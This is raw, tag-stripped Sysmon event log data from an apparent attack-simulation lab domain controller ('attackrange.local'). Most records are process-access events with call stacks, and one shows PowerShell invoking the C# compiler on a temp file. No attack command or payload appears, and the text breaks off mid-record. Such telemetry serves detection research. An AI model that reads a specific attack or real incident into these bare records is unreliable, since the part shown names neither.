15:52:14.526{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003636Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003635Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003634Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003633Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003632Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003631Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003630Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003629Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003628Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CAE-5FA1-B400-000000008801}2608C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003627Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7CAE-5FA1-B300-000000008801}13562868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CAE-5FA1-B400-000000008801}2608C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003626Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.533{D28789B6-7CAE-5FA1-B400-000000008801}2608C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES3D52.tmp" "c:\Users\Administrator\AppData\Local\Temp\4j4ssjqy\CSC1D37E47B7624A64B5816726CDA8A948.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CAE-5FA1-B300-000000008801}1356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\4j4ssjqy\4j4ssjqy.cmdline" 10341000x80000000000000003625Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAE-5FA1-B300-000000008801}1356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003624Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003623Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003622Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003621Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003620Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003619Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003618Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003617Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003616Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CAE-5FA1-B300-000000008801}1356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003615Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003614Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.448{D28789B6-7CAD-5FA1-B200-000000008801}6525080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAE-5FA1-B300-000000008801}1356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffe040(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffe040(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312083cc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57f